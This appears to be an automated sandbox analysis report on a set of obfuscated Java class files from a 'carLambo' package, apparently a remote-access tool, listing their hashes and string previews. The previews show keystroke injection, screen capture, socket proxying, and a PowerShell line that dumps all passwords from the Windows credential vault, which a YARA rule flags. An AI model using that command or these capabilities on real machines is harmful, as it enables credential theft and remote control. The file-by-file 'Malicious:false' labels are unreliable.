                        SSDEEP:6:2mYCLTKbUwCvWqdUwCvWiUwCvWqtGi1BoUwCFRPfAKmklAlI:EoT/wCvWfwCvWhwCvW6p1xwCFRHlGi
                        MD5:CDB50558D382E6554721DDD443BC7744
                        SHA1:55E88F2195A0C808E3330DE4DBE5DFBAC091201F
                        SHA-256:7DEF5E0649A951A502C01BC34A444DAD98805C0EF2C06E82FC3554742A16532E
                        SHA-512:9FAD12AAC340B417262895B7D2AB4304F8C3985997A117FA4CFFC4B515CF07208053519ECA569155A0E00C0DC606B02DE6593F0587D367BC88440F5FF3919DED
                        Malicious:false
                        Preview:.......4..............(BBII)V..Q(Lcom/sun/jna/platform/win32/WinDef$HWND;)Lcom/sun/jna/platform/win32/WinDef$HDC;...(Lcom/sun/jna/platform/win32/WinDef$HWND;[BI)I...GetWindowDC...GetWindowTextA...carLambo/User32..!com/sun/jna/platform/win32/User32...java/lang/Object...keybd_event........................................
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):1754
                        Entropy (8bit):5.683676344488871
                        Encrypted:false
                        SSDEEP:48:orX16cSgjo54CvWiJFLC3nnKCyCvW8+QHz5D8KvRq7nrHspVEJzmH+:o0jFzFEP+VKv47nrH22VmH+
                        MD5:5445BD2AABDD4F1C9522D025E98E5AF5
                        SHA1:34ED09E5FE0725234E68FFB2E5C3B0B65592A90C
                        SHA-256:B0A518623F8A322E45BD9B963E548ECADFA8AFFAA5E7B36F1DF45EC798C4CF55
                        SHA-512:0797427396B3AF381409B6017D0E9A3A39AF112927A26109E0AF36B627E50AA594C615FF352CFE24CE93F1DC9E392FFCA57A5797988A6D1D1689F3FAB8D670C6
                        Malicious:false
                        Preview:.......4.S..0..1..2..3..4..D..G..H..I..M..N..O..P..........................;........<.............,....'....+....%....%........./....%....(....)....-....*....&..=.7..?.:..A.C..F.9..F.<..J.5..K.@..L.B..Q.6..R.8..R.;... Sec... day ... hr ... min ... sec...()J...()Ljava/lang/String;...()V...(J)Ljava/lang/String;...(J)Ljava/lang/StringBuilder;..5(Lcom/sun/jna/platform/win32/WinUser$LASTINPUTINFO;)Z..&(Ljava/lang/Object;)Ljava/lang/String;..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...<init>...Code...GetLastInputInfo...I...INSTANCE...J..#Lcom/sun/jna/platform/win32/User32;...Not Idle...StackMapTable...append..$carLambo/VRdaqkGKmButMUdsZLfSOLnpgVk..!com/sun/jna/platform/win32/User32..0com/sun/jna/platform/win32/WinUser$LASTINPUTINFO...currentTimeMillis...dwTime...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/String...java/lang/StringBuilder...java/lang/System...toString...valueOf.1...........L.B.......=.7...>...7.......+*...*......#@...Y...N...-..$..W*.-....e...........L.6...>...
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):324
                        Entropy (8bit):5.260373383168725
                        Encrypted:false
                        SSDEEP:6:WeNVjnY+kaGZXy1eUwCvWOMh5nWDA3bUwCvWOMhc8UwCvDRPU3sz+wl85//l:pNVjnvkZy1lwCvWz0DxwCvWzcrwCvDRy
                        MD5:AD45C3E50AB8656ECAFF9C840AF8281F
                        SHA1:9BAA18E4659B690F7EE49496AC318E4C7EA78308
                        SHA-256:EC32BCF18F93DD9F4E4D77BB1FBD36C7DF08052E352C2C06DC4B622BCBCCE747
                        SHA-512:69B02C35E4F1FBCD26AC2A9AC7D34509E4FBDE587E41AEF4C17C0C32AA3ED246032F0C98CC334A541497FEA2D7BBAC072B5D5EA0625C54B58BF3E6C6704E822F
                        Malicious:false
                        Preview:.......4...................... .......................()V...(J)V...<clinit>...<init>...Code..)Lcom/sun/jna/platform/win32/WinDef$DWORD;...SRCCOPY...carLambo/WinGDI..'com/sun/jna/platform/win32/WinDef$DWORD..!com/sun/jna/platform/win32/WinGDI...java/lang/Object...............................................Y................
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):404
                        Entropy (8bit):5.524843262593639
                        Encrypted:false
                        SSDEEP:12:FbQdNIGYy1EdNIx0K6AdNIZLnxaJtRl9/LqkM50:FbQdy7y1EdyN/dyZTQHz9bM50
                        MD5:926713709777A7C3B985BDE381CEAB3D
                        SHA1:1E312BEFE15B55306535AA63774275F79E59F62A
                        SHA-256:8B1EA82CED893E695B7CBB2741B6E7C1E3BF48050EBC072A489DBEEA2FCB0F45
                        SHA-512:823E729E57642486091CDBED101C9DFA514C6133E0EA81027D1FC356BDB7E38CB62776A7F9BC8CB78F4546E8CAC95A6A0E3A7DF2D1F5A62A5FF6EC92DC637A5D
                        Malicious:false
                        Preview:.......4...............................................()V..)(LcarLambo/eQJCBbLIHBNfWZJLmUQdjvxUQzC;)V...<init>...Code..&LcarLambo/eQJCBbLIHBNfWZJLmUQdjvxUQzC;..&carLambo/WzOHQjRyKNNQtPOMcLqvxzsvisZhr..$carLambo/eQJCBbLIHBNfWZJLmUQdjvxUQzC...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...run.0..........................................*+...*..............................*.............
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):2997
                        Entropy (8bit):5.904027246615274
                        Encrypted:false
                        SSDEEP:48:jm6CQBGeap7nJwh/r38SdU9n1H7qQrqNM5DVnq/3i/u2AIvyyE/zlF+22LQv3IEc:j/CvLBn0VffqxvKzlFvlv3PDpC
                        MD5:D843AAEB00849A9556FAC7404B01A8AF
                        SHA1:905667A62C3F05F3771778121533D0EBC5D8EC42
                        SHA-256:4BE83ACD2250355EA94FDD6B26B32099B1A423C5B88EA649E9A5808540C44B84
                        SHA-512:217F1B76FB449FAE2532DCF238EB3A090781E9737F3A43406341812F434F7BA29724F7BDFF1620294223D31A666F9D761DD8DFDA214BF32C117FF0360D37F566
                        Malicious:false
                        Preview:.......4....g..h..i...................................................................M....N....S....T....Y....Z....]....[....E....E....H....P...._....I....P....R....e....P....^....F....P....R....f....G....\....W....D....V....X....L....`....a....K....Q....U....d....D....O....c....J....b....V....X....n....p....q....r....s....t....v....}....~..............w....n....u....n..............o....j....m....k...................x.........|....m....z....l....n....m....m....x....{...............()Ljava/io/InputStream;...()Ljava/io/OutputStream;...()Ljava/lang/Process;...()Ljava/lang/String;...()V...()[B..+(LcarLambo/XfrcwHiEekkBljrjyatNOjRICOGWh;)V...(Ljava/io/InputStream;)V...(Ljava/io/OutputStream;)V...(Ljava/io/Reader;)V...(Ljava/io/Writer;)V...(Ljava/lang/Object;)Z...(Ljava/lang/Runnable;)V..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...(Ljava/lang/String;)V..'(Ljava/net/Socket;[Ljava/lang/String;)V...(Z)Ljava/lang/ProcessBuilder;...([B)V...([BII)I...([BII)V...([Ljava/lang/String;)V...<init>
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):389
                        Entropy (8bit):5.5299865037558575
                        Encrypted:false
                        SSDEEP:6:Fb2U3jsW3cmMWlW4y133cmMR6DPWHS3cmMMQQnxaJ2qRPt+NclVXi8BPmlknM50:Fbrly13+gikLnxaJtRl9/LqkM50
                        MD5:B5CCE3EC2BCF15D622F94F91AADCAF7C
                        SHA1:B2C2035C95FF4D57175C97792AE89E2B50A6D7AE
                        SHA-256:1996CB092151F69B1704EBAA312951B29D053EBCDEBDF74E2C8F76661E42F6B2
                        SHA-512:DCDE02D1A194CC242BC4D33C74C640770CDF70572DF12FD8B7FCC872D4C9414C6467E5287E752DDB7F14F1C3ECC9D333E579B64B811307820A882461E5820C51
                        Malicious:false
                        Preview:.......4...............................................()V..&(LcarLambo/cUFMRzrqZzmkSJziceHSMVGQ;)V...<init>...Code..#LcarLambo/cUFMRzrqZzmkSJziceHSMVGQ;.. carLambo/YEJPIdRNPZsBIbCpFLfaCVN..!carLambo/cUFMRzrqZzmkSJziceHSMVGQ...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...run.0..........................................*+...*..............................*.............
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):1307
                        Entropy (8bit):5.673348607994263
                        Encrypted:false
                        SSDEEP:24:XeqJDjMGy1c4V6lYNqQ2CxndxzigLrz0IM0HlHs4zEchgd/:uC5KwKNqQ2YzQI1Lhgd/
                        MD5:484D58ABEE51CD22C22D933C546FF083
                        SHA1:5901BAE0B352842839D7E4DD1E0B3B9D2DD944CC
                        SHA-256:87FCF75150D6A990DB61CDF7C428F9DA5F1940131FED4E67EC92FA8302181C6F
                        SHA-512:426F231E78148F6177D3E070AF89346EE6C72B0F24CB5AE98B1EE17DD58A03C899237A38E84BD21C199CB0FEB1722887CD26B2D710602012A39AD474429213F3
                        Malicious:false
                        Preview:.......4.L..6..7..>..?..@..A..B..C..D..E.............."....#....%....$.........&..............'....$.............. ....!....*..0.3..8.*..9.*..:.5..;.(..<.)..=.3..F.1..G.*..H.2..I.,..K.-...()Ljava/io/InputStream;...()Ljava/io/OutputStream;...()V..%(Ljava/net/Socket;Ljava/net/Socket;)V...([BII)I...([BII)V...<init>...Code...GYDTPVEwzYqRTvxmvHtRLJG...Ljava/io/InputStream;...Ljava/io/OutputStream;...Ljava/net/Socket;...StackMapTable...Z...[B...carLambo/YlqtqHSDDFgBzCqfJBUfI...close...flush...gQEuyVcYntwPXTysEtfquh...getInputStream...getOutputStream...ghKDbwZCNsgFCyEcTHODu...java/io/IOException...java/io/InputStream...java/io/OutputStream...java/lang/Exception...java/lang/Object...java/lang/Runnable...java/lang/Throwable...java/net/Socket...nnHRYoAONroTDXAkGOnAtRE...printStackTrace...qvNsplybcQmnatGjnQTThBZ...read...run...write.1.............:.5.....F.1.....H.2.....=.3.....0.3.........+.../...T.......+*...*....*+...*,...*+......*,.......W*..........#.$.....4........$.............J.*.../...2.
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):1631
                        Entropy (8bit):5.664039473604183
                        Encrypted:false
                        SSDEEP:48:wdyW214TQtwob5DI+U89e7Hr1Yq0oSaqf:2yK4ve7HpH0oSn
                        MD5:335DF3DC9FC24209223A3FC49B0F8B4A
                        SHA1:08DDECFF6340E24A390758830BF7D4EC81EAADD4
                        SHA-256:ACDB39711E52C236C5EF0F66DA40943F2D02DD4AA9D43E9A424326D70CF5E695
                        SHA-512:8BAFAB0E0B64EB67E284FFC1E693DDBC8A156D4E52B4B3105BCEA31680198E5C128E111968669B663D2132A73ACE21A0F8E82A6B8ED5424BE16508F5EA6ACD2E
                        Malicious:false
                        Preview:.......4.]..2..3..@..B..A..D..H..I..J..K..L..M..N..O..P..Q..R....,....&....)....*....+....#.........'....-....$..../....1....#....$....%....0....(..<.5..<.:..C.8..E.:..F.9..G.7..S.6..T.6..U.:..V.>..W.5..X.:..Z.;..[.4..\.4... is invalid key.VK_..* is not defined in java.awt.event.KeyEvent...()Ljava/lang/String;...()V...(I)V...(Ljava/lang/Object;)I..-(Ljava/lang/String;)Ljava/lang/StringBuilder;..-(Ljava/lang/String;)Ljava/lang/reflect/Field;...(Ljava/lang/String;)V..'(Ljava/lang/String;)[Ljava/lang/String;...<init>...Code...Ljava/io/PrintStream;...StackMapTable...VK_...[Ljava/lang/String;...\+...append...carLambo/a...gQEuyVcYntwPXTysEtfquh...getField...getInt...java/awt/Robot...java/awt/event/KeyEvent...java/io/PrintStream...java/lang/Class.. java/lang/IllegalAccessException.."java/lang/IllegalArgumentException...java/lang/NoSuchFieldException...java/lang/String...java/lang/StringBuilder...java/lang/System...java/lang/reflect/Field...keyPress...keyRelease...nnHRYoAONroTDXAkGOnAtRE...out
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):2164
                        Entropy (8bit):5.848194950396849
                        Encrypted:false
                        SSDEEP:48:zgl+to1Ehse9vwBAMcvYWJ75TQ2AqNM5KyBa5vq8Zw8yOrt:E2o1hS9175p6WqKrt
                        MD5:C476698F30A29ACE57135CBA26FB39BA
                        SHA1:A6026877167A50845A5ADB16549A36A9C9BDDEF5
                        SHA-256:B994E1F015FD9E0E065C8B598572B06F88307DB637FD49369273900A9018CA2A
                        SHA-512:D03436E7619A8845D347EEE216EE9E734277AC35BF5F4ED0CCE97F7CAEBACD2896088F218616691D9A255ABA37BDEA37CE9D04EB15171B1E71F24F46D22E8FAA
                        Malicious:false
                        Yara Hits:
                        • Rule: INDICATOR_SUSPICIOUS_PWSH_PasswordCredential_RetrievePassword, Description: Detects PowerShell content designed to retrieve passwords from host, Source: C:\jar\carLambo\akllnBiTjwPmAwfMbajsTFm.class, Author: ditekSHen
                        Preview:.......4....E..F..G..H..I..J.._..`..b..c..e..y.....d..g..o..p..q..r..s..t..u..v..w....8....2....5....=....1....5....0....9....:....3....>....@....6....7....;....<....?....A....B....D....0....4....C..\.P..\.S..\.T..\.[..f.X..h.P..i.U..j.V..k.^..l.L..m.M..n.W..x.K..z.O..{.Z..|.Y..}.N..~.Q..~.R....O....O............... ..@$vault = New-Object Windows.Security.Credentials.PasswordVault....5$vault.RetrieveAll() | % { $_.RetrievePassword();$_ }...()I...()Ljava/io/InputStream;...()Ljava/io/OutputStream;...()Ljava/lang/Process;...()Ljava/lang/String;...()V...(I)Ljava/lang/String;...(II)Ljava/lang/String;...(Ljava/io/InputStream;)V...(Ljava/io/Reader;)V...(Ljava/lang/CharSequence;)Z...(Ljava/lang/Object;)Z...(Ljava/lang/String;)I..-(Ljava/lang/String;)Ljava/lang/StringBuilder;..'(Ljava/lang/String;)[Ljava/lang/String;...(Z)Ljava/lang/ProcessBuilder;...([Ljava/lang/String;)V...<init>...Code...Ljava/lang/String;...No Password Found...Password: ...StackMapTable...Username: ...Website: ...[Ljava/lan
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):6457
                        Entropy (8bit):6.037911000781222
                        Encrypted:false
                        SSDEEP:96:nPhBW8rFDgJC5YReBpCYDujLnJ7rZdlTJARfEFQTA8IbcOb:nrrFDWRRSCYEJ7HlqsFQTA8Ibck
                        MD5:B52C63A67C2B563C15BD10DA3FE29626
                        SHA1:CAAD527B427C3465A4F8360EDAD23E9CA8B0F723
                        SHA-256:0AD9C7F0183D84D6FC5FDBE1263F0356EA9EE6E4AFD1579CDDDE83105006BBB2
                        SHA-512:BF2046F4FF4EB178ECC01925174553457367501362398AF66B3BB7FE16EF4FFE08D3AEB258677283221DC1DBECAB54CC152BC897BBE01F453B8CEAA58E910757
                        Malicious:false
                        Preview:.......4..............................................?...........................................................................................Y....Z....[....\....]....^....c....p....s....t....u....|....~...._....e....f....g....h....i....j....q....r....l....v....W....V....m.........U....k.. .X.. .d.. .o.. .{..!.W..!.a..!.b..!.z..".n..".x..#.U..$.U..$.w..&.y..&.}..%.`.......................................................................................................................................................................................................................... key=... value=...()I...()Ljava/lang/Class;...()Ljava/lang/String;...()Ljava/util/prefs/Preferences;...()V...(I)C...(I)Ljava/lang/Integer;...(I)Ljava/lang/StringBuilder;...(I)V...(ILjava/lang/String;)V..&(ILjava/lang/String;I)Ljava/util/List;..%(ILjava/lang/String;I)Ljava/util/Map;..:(ILjava/lang/String;Ljava/lang/String;I)Ljava/lang/String;..)(ILjava/lang/String;Ljava/lang/String;I)V..;(ILjava/lang/Strin
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):605
                        Entropy (8bit):5.763657797884115
                        Encrypted:false
                        SSDEEP:12:k7l77cvIyjsINyhy1djGajjjBJKunxaJtRloOOul6zDdY:k7BcAypoy1dqaXdJKcQHzoa6z2
                        MD5:1E784B2DDE77676EEC6FC32FE209BCEF
                        SHA1:ED1732352C4DA74145CFB9E04ADA0F5390CFB918
                        SHA-256:9B80C5D5A72E8FBF830BC5B360FCACDF28A1DE8F408A7C1483F9BCA0B912F041
                        SHA-512:859234CC7A44DF1C477549557BC794B76A8D3A93D96577CA4F08D1AA6566D033963FCBA5EE183EF30043B3FC5B34DA8DA98E8FBB30E17E4D063FC2219F53E081
                        Malicious:false
                        Preview:.......4...................................................................()V..X(LcarLambo/CHHXGzeSpzwiJOAtZoSZBJ;Ljava/net/Socket;LcarLambo/SjomlJrGISDYNqiAAulMONOv;)V...<init>...Code..!LcarLambo/CHHXGzeSpzwiJOAtZoSZBJ;..#LcarLambo/SjomlJrGISDYNqiAAulMONOv;...Ljava/net/Socket;...carLambo/CHHXGzeSpzwiJOAtZoSZBJ..&carLambo/bQOGTazZDTmWsQIjxomKkpLaxswAl...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...nnHRYoAONroTDXAkGOnAtRE...qvNsplybcQmnatGjnQTThBZ...run.0................................................. ........*+...*,...*-...*..............................*...*...*.............
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):5104
                        Entropy (8bit):6.095329676869486
                        Encrypted:false
                        SSDEEP:96:m52DWvW4FyuffwrB4gATDhzZ48EIy9IOCy7tr:m5hv3cU4DIybCyV
                        MD5:8AEC05B33A13303D523D304F00DBA48F
                        SHA1:F29EFD66C64B3D80C63A2D09FC29C85D16EF6186
                        SHA-256:D944C2313531DCA7631D1431E7510DEF4048D6F6A8A88DA17B2624CA01986DF7
                        SHA-512:91067804E15185ECDC26E57C3E7E35F77A488690B3A4D4578DAF5A9C3B5D3E4260EE3B106BF69FFE1368806714EC565A824BD29BA138EC46FD5004B24235D8D8
                        Malicious:false
                        Preview:.......4....x.................................................................................................Y....Z....\....a....b....e....f....g....i....o....j....P....m....Q....X....h....n....P....S....^....p....T....^....`....v....^....`....w....l....P....V....W...._....c....q....P....S....]....u....R....s....t....^....d....k....U....[....r....{....~..................................{.............................{.........{..............|....y............................................z....{...................{....}....{....z................()Ljava/io/OutputStream;...()Ljava/lang/String;...()V...()[B...(J)V..&(LcarLambo/cUFMRzrqZzmkSJziceHSMVGQ;)V..D(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;...(Ljava/lang/Object;)Z...(Ljava/lang/Runnable;)V..&(Ljava/lang/String;)Ljava/lang/String;..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...(Ljava/lang/String;)V...(Ljava/lang/String;)[B...(Ljava/lang/String;Z)V..&(Ljava/net/Socket;Ljava/lang/String;)V..3(Llc/kra/sys
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):4459
                        Entropy (8bit):6.043498078207814
                        Encrypted:false
                        SSDEEP:96:TSKYkvdX5ks8nMFs5CPvCu/dXcs2eqxG9DeJ8FWz8gQ6u/dXt2n:W2dX5ksc6CuFXcsNqxG9Do8i8g5uFXt0
                        MD5:07C4B9666E9BECE18CCEB735EF10697A
                        SHA1:638C68E1632F8E786531C921EC3247B7D36D6B24
                        SHA-256:A2A2088C96D3097F40DA81177AF2DD1F959101FEF05DF3D41E67E379DFFA655B
                        SHA-512:DE408986041DAB126AE820EF8946DD74D0B663F3C384267FA1ECF692BA17636629353484434965DAE7684A49C32E6D7E00926F243A7948CF78979EC145CEA6B5
                        Malicious:false
                        Preview:.......4....w..x..y..z.......................................................................................................a....f....h....k....Q...._....`....S....m....j....l....R....^....v....P....i....P....c.. .W.. .n.. .p..!.]..!.e..".V..".Z..".[..".\..".b..".g..".o..".r..".s..".u..#.P..#.U..#.X..#.Y..#.t..$.T..$.q..%.c..%.d...................................................................................................|....}...........................................................~................................................ /T...()I...()Ljava/io/InputStream;...()Ljava/io/OutputStream;...()Ljava/lang/Process;...()Ljava/lang/Runtime;...()Ljava/lang/String;...()V...()[B...(I)Ljava/lang/String;...(I)Ljava/lang/StringBuilder;...(II)Ljava/lang/String;..)(LcarLambo/eQJCBbLIHBNfWZJLmUQdjvxUQzC;)V...(Ljava/io/InputStream;)V...(Ljava/io/Reader;)V...(Ljava/lang/CharSequence;)Z..&(Ljava/lang/Object;)Ljava/lang/String;...(Ljava/lang/Object;)Z...(Ljava/lang/Runnable;)V...(Ljava/lang/S
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):425
                        Entropy (8bit):5.3297017748412285
                        Encrypted:false
                        SSDEEP:12:l29ZYnvk9y1zk6tkFnxaJY3RlT+8MtrvlorPeXS/k:lY889y1zPtkBQwzTHMh9dgk
                        MD5:4EFF7D645E765F9CA708FBA6757020C3
                        SHA1:FBFAE6A7521D4A2B1DC5B54B8A2ABAC5274789E2
                        SHA-256:8B621560710DB346C98CC57A848B7C4A4E4EA41B8D217D9D6485E1B9E9A8159E
                        SHA-512:E4FC2C4A296AED10A5FCB54A175A55E68BBE28D61C5B9EC225D774E3DC4C961456F70CB00B9BC9B9016843D47C979483827F75E87D6E694A88F18413A6C4AF21
                        Malicious:false
                        Preview:.......4...........................u0.................................()V...(J)V...(Z)Z...<init>...Code...StackMapTable..!carLambo/cUFMRzrqZzmkSJziceHSMVGQ.."carLambo/fnSeRWCjpCYtFrMVMUvfGdMUp...gQEuyVcYntwPXTysEtfquh...java/lang/Exception...java/lang/Object...java/lang/Runnable...java/lang/Thread...run...sleep.0..................................*.....................4..................W.W.................................
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):1865
                        Entropy (8bit):5.805100375898925
                        Encrypted:false
                        SSDEEP:48:qCClP4sHYcKmAI6+61fQlQ2Of/zWNk3usoimVJfvha:qRPH5K/IE4pO/usoDHa
                        MD5:FAC42C29E155E1B389119EB06EEDAEF8
                        SHA1:98B611345F70C2FB020513DD7F6080AF0F49A528
                        SHA-256:7458015FC6760A82F716D3F7BE2D7F7767E2DE794E7462B03577D3D8856B4F48
                        SHA-512:28B49399656F86A5E9222CF6F560D842DAE5C844F98A8836CA6E006163E58CBC4B2F4589E6CAB8EFBBAFA34155E9A0BF9E67C3207579833F64550CD02CDA9F8C
                        Malicious:false
                        Preview:.......4.w.......R..S..U..V..X..[..d..e..f..g..h..i..j..k..l..m..n....<....+....*....>..../....0....3....7....:....;....=....?....*....9....1....5....8....2....6....,.........-....4..Q.A..Q.H..Q.M..Q.O..Q.P..Y.D..Z.B..\.N..^.K.._.L..`.B..a.F..a.G..b.@..c.E..o.M..q.L..r.D..s.I..t.@..u.C..v.L...()I...()V...()[B...()[C...(I)Ljava/nio/ByteBuffer;..B(ILjava/security/Key;Ljava/security/spec/AlgorithmParameterSpec;)V..)(Ljava/lang/String;)Ljavax/crypto/Cipher;..3(Ljava/lang/String;)Ljavax/crypto/SecretKeyFactory;...(Ljava/lang/String;)V...(Ljava/lang/String;[B)Ljavax/crypto/SecretKey;...(Ljava/lang/String;[B)[B..6(Ljava/security/spec/KeySpec;)Ljavax/crypto/SecretKey;...([B)Ljava/nio/ByteBuffer;...([B)V...([B)[B...([BLjava/lang/String;)V...([C[BII)V...<init>...AES...AES/CBC/PKCS5PADDING...Code..SNonce size is incorrect. Make sure that the incoming data is an AES encrypted file....PBKDF2WithHmacSHA1...StackMapTable...[B...allocate...array...carLambo/gQEuyVcYntwPXTysEtfquh...doFinal...gQEuyVcYnt
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):9142
                        Entropy (8bit):6.37171406283025
                        Encrypted:false
                        SSDEEP:192:3vMddEU20zVrkkkL2VCaMXfK2XCuG2/SvCVAGNfli:3WdNx4kdVEXfKgT/SvCk
                        MD5:A95739E5E9BE30BAD71B240E1C82891F
                        SHA1:E59D1C237E343D52F1CAF222299DE3571AD87C7D
                        SHA-256:18BA14777BF084A5EE67F4B7AF833A2366E4D7DCAA251713C96651C785EA1058
                        SHA-512:A0D649DDFA5F28E55F9A9AA344C2792529EB14D73CC085AE7268EAA435C27521EAAB0FAB448EE32065E15798BC0B7197B4ACB281AC325F6B1B78F816DCBC4873
                        Malicious:false
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):888
                        Entropy (8bit):5.66217626492331
                        Encrypted:false
                        SSDEEP:12:RVGMlwMxzeCMO6DewMaMT2De9MTMBMRMJy1DgDesYMOZERSfgmHgD8nxaJQRluM8:RYMlwMxnpy1DrERSYsQizn+lcTdWXlr/
                        MD5:48682699090E32C183D70891E84F0FDC
                        SHA1:AA23556FD74A1324E571BB286C93D4CFE6E39D27
                        SHA-256:00CC01F556AE041546740F22672182D559D8D1A4B04372E67E7EC45868BE2904
                        SHA-512:68FF40935426A109D9AC5A31EDCEBE3B2C850AEF4EF064056517C96E761476F404BE56360D6FD7A3DD3121595655218B278634B7893D7182C5047D85857B15D1
                        Malicious:false
                        Preview:.......4.5..#..(..)..+..,..-...../...............................................!....!. ..'....*....*.&..0.$..1.%..2. ..4.....()Ljava/lang/String;...()V..I(LcarLambo/qvNsplybcQmnatGjnQTThBZ;Ljava/lang/String;Ljava/lang/String;)V..8(LcarLambo/qvNsplybcQmnatGjnQTThBZ;[Ljava/lang/String;)V..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...(Ljava/lang/String;)V...<init>...Code...Downloaded: .."LcarLambo/qvNsplybcQmnatGjnQTThBZ;...Ljava/io/PrintStream;...[Ljava/lang/String;...append...carLambo/ghKDbwZCNsgFCyEcTHODu.. carLambo/qvNsplybcQmnatGjnQTThBZ...gQEuyVcYntwPXTysEtfquh...java/io/PrintStream...java/lang/Object...java/lang/Runnable...java/lang/StringBuilder...java/lang/System...nnHRYoAONroTDXAkGOnAtRE...out...println...run...toString.0.............*.&.....0.$.......!....."............*+...*,...*...........3....."...;......./*...*....2*....2.........Y.....*....2................
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):1287
                        Entropy (8bit):5.871854571382549
                        Encrypted:false
                        SSDEEP:24:IplKHiNq0ny1fk+7VwBc26Q3z5TqUIHXy6gbel6/:UrNqOI7GQQ3z5TjIHLgelK
                        MD5:090729C4BD64CC0AFC1D74A60F1CA36F
                        SHA1:9DE5E08C20B2393F920B664B2F74950F792725C4
                        SHA-256:4FA50508997EB6ACBCA26C49C382163F49F046080016B81D33E288768B6E1FE7
                        SHA-512:AA891B87C4B8618F5AE575A9068047571F3F44BE4376E5D6072EAE0E9DAFAD828F8CCF0DB8B526CF874E886B5406B6FC8F4A138C0E1A12362218478E08ADB385
                        Malicious:false
                        Preview:.......4.Q..+..=..@..A..B..C..G..H..I..J..K..L....#....'...."....#....&....!....*.........$....).............. ....(.........%..7....7.4..7.5..?.3..D.2..D.:..D.<..E./..F.,..M.9..M.;..N.-..O.0..P.6..........()Ljava/io/OutputStream;...()Ljava/lang/String;...()V...()[B...(I)Ljava/lang/String;..,(LcarLambo/AILeJFODIHNyHULMHPDMqXVIZVnaVD;)V..](LcarLambo/AILeJFODIHNyHULMHPDMqXVIZVnaVD;Ljava/net/Socket;LcarLambo/iWGSWxRnUlPNEVGNllqlF;)V..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...(Ljava/lang/String;)V...(Ljava/lang/String;I)V...([B)V...<init>...Code...I..)LcarLambo/AILeJFODIHNyHULMHPDMqXVIZVnaVD;..#LcarLambo/gjWVByXBXFzoJIWyWKFqdDDX;...Ljava/lang/String;...RProx:...StackMapTable...append..'carLambo/AILeJFODIHNyHULMHPDMqXVIZVnaVD..!carLambo/gjWVByXBXFzoJIWyWKFqdDDX...carLambo/iWGSWxRnUlPNEVGNllqlF...carLambo/rCYbIngZMxCXvVYABulZ...gQEuyVcYntwPXTysEtfquh...getBytes...getOutputStream...java/io/OutputStream...java/lang/Exception...java/lang/Object...java/lang/String...java/lang/StringBuilde
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):7834
                        Entropy (8bit):6.093106794907294
                        Encrypted:false
                        SSDEEP:192:W4HyBSJO8YrG1HF2AmfL786W8UWitZqg2nYmf/:W4HyBSJjYrwHF2AmfX86WXWyL2Ymf/
                        MD5:E01DC22C7A67D442AD9259AB660F3A52
                        SHA1:14E6710A58122A455D236ECDF5796BE1BA5A4CC0
                        SHA-256:216EB9019601B83042640ABE2B2F8CC6899FCCA3C60216592F2810EF158AAFDB
                        SHA-512:A757672362EC616646EAA30ACF20D2D53B1F983BB874183FCAE327C8C0D83FC3CEDEBCB28BA9CFCB9A896B80253C05B71355748C146AEF095B5146143AE8EA04
                        Malicious:false
